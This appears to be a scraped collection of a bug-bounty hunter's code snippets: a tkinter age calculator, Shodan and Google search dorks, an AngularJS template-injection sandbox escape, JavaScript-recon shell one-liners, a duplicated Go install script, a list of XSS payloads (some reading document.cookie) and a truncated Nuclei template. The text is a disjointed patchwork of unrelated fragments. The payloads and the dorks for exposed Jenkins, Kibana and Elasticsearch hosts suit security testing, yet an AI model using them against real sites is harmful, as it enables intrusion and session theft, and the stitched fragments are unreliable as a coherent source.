PushkraJ99

#Age-Calculator-Project (Github:-PushkraJ99)
from tkinter import *
from datetime import date

win = Tk()  
win.title("AGE-CALCULATOR")   #Title
win.configure(bg="#4F4F4F")   #Backround color
win.geometry("400x400")       #Size of the window
new = Label(win,bg="#4F4F4F") 
new.grid(row=5,column=0,columnspan=3)

PushkraJ99

org: org_name
kibana content-length:217
org:”Amazon” ssl:”target”
ssl:”target”
html:”Dashboard Jenkins” http.component:”jenkins”
http.title:”302 Found”
http.component%3A”java”
https://www.shodan.io/host/ip#9200
https://www.shodan.io/host/ip
X-Redirect-By: WordPress ssl:”name”

PushkraJ99

1.3.2 and below

{{7*7}}

'a'.constructor.fromCharCode=[].join;
'a'.constructor[0]='\u003ciframe onload=alert(/Backdoored/)\u003e';

PushkraJ99

Description

This is a simple guide to perform javascript recon in the bugbounty

Steps

• The first step is to collect possibly several javascript files (more files = more paths,parameters -> more vulns)

PushkraJ99

curl -L -k -s https://www.example.com | tac | sed "s#\\\/#\/#g" | egrep -o "src['\"]?\s*[=:]\s*['\"]?[^'\"]+.js[^'\"> ]*" | awk -F '//' '{if(length($2))print "https://"$2}' | sort -fu | xargs -I '%' sh -c "curl -k -s \"%\" | sed \"s/[;}\)>]/\n/g\" | grep -Po \"(['\\\"](https?:)?[/]{1,2}[^'\\\"> ]{5,})|(\.(get|post|ajax|load)\s*\(\s*['\\\"](https?:)?[/]{1,2}[^'\\\"> ]{5,})\"" | awk -F "['\"]" '{print $2}' | sort -fu

# using linkfinder
function ejs() {
   URL=$1;
   curl -Lks $URL | tac | sed "s#\\\/#\/#g" | egrep -o "src['\"]?\s*[=:]\s*['\"]?[^'\"]+.js[^'\"> ]*" | sed -r "s/^src['\"]?[=:]['\"]//g" | awk -v url=$URL '{if(length($1)) if($1 ~/^http/) print $1; else if($1 ~/^\/\//) print "https:"$1; else print url"/"$1}' | sort -fu | xargs -I '%' sh -c "echo \"\n##### %\";wget --no-check-certificate --quiet \"%\"; basename \"%\" | xargs -I \"#\" sh -c 'linkfinder.py -o cli -i #'"
}

# with file download (the new best one):
# but there is a bug if you don't provide a root url

PushkraJ99

inurl /bug bounty
inurl : / security
inurl:security.txt
inurl:security "reward"
inurl : /responsible disclosure
inurl : /responsible-disclosure/ reward
inurl : / responsible-disclosure/ swag
inurl : / responsible-disclosure/ bounty
inurl:'/responsible disclosure' hoodie
responsible disclosure swag r=h:com

PushkraJ99

#!/bin/bash
## Install Golang Stable 64Bits on Linux (Debian|Ubuntu|OpenSUSE|CentOS)
## http://www.linuxpro.com.br/2015/06/golang-aula-1-instalacao-da-linguagem-no-linux.html
## Run as root (sudo su)
## Thank's @geosoft1 | @gwmoura


GO_URL="https://go.dev/dl"
GO_VERSION=$(curl -s 'https://go.dev/VERSION?m=text'|head -n1)
GO_FILE="$GO_VERSION.linux-amd64.tar.gz"

PushkraJ99

#!/bin/bash
## Install Golang Stable 64Bits on Linux (Debian|Ubuntu|OpenSUSE|CentOS)
## http://www.linuxpro.com.br/2015/06/golang-aula-1-instalacao-da-linguagem-no-linux.html
## Run as root (sudo su)
## Thank's @geosoft1 | @gwmoura


GO_URL="https://go.dev/dl"
GO_VERSION=$(curl -s 'https://go.dev/VERSION?m=text'|head -n1)
GO_FILE="$GO_VERSION.linux-amd64.tar.gz"

PushkraJ99

#<script>alert(1)</script>
1%22onfocus=%27window.alert%28document.cookie%29%27%20autofocus=
"><form onformdata%3Dwindow.confirm(cookie)><button>XSS here<!--
#javascript:alert(2);
"><svg onload=alert(1)>
[email protected]%27\%22%3E%3Csvg/onload=alert(/xss/)%3E
[email protected]%2527%5C%2522%253E%253Csvg%2Fonload%3Dalert%28%2Fxss%2F%29%253E
//?aspxerrorpath=<script>alert(1)</script>
嘼嘾img%20src%3Dx%20onerror%3Dprompt%28document.domain%29%3B%3E
alert##<script>prompt(1234)</script>

PushkraJ99

id: backupfiles

info:
  name: Compressed Backup File - Detect
  author: toufik-airane,dwisiswant0,ffffffff0x,pwnhxl,mastercho,PushkraJ99 
  severity: medium
  description: Multiple compressed backup files were detected.
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
    cvss-score: 5.3